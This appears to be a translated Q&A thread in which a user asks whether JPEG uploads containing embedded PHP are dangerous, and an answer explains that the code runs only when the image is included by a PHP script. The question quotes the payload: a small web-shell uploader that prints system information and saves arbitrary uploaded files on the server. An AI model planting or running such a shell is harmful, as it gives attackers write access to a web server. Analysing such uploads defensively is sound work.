jpeg — загруженный пользователем файл jpg, содержащий код php — это потенциальный вирус

Пользователь загрузил несколько изображений jpg, которые, кажется, содержат некоторый php-код. Файл начинается с ÿØÿà, за которым следует NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿá NUL SYN Exif NUL NUL II * … (много других нулевых символов и т. Д.). Тогда следующий код php:

echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}

сопровождается большим количеством двоичного кода. Изображение показывает ногу с черным (как положить ногу на сканер или копир).

Эти изображения потенциально опасны? Если да, то как.

2

Решение

Да. Это внедрение кода, которое использует известную ошибку, подробнее: http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/

Эти изображения выполняют код, только если ваш PHP-скрипт использует require($image) или же include($image) отображать ваши изображения, в противном случае, не волнуйтесь. Не забудьте отследить пользователя и, возможно, включить его в черный список 🙂

1

Другие решения

Других решений пока нет …

По вопросам рекламы [email protected]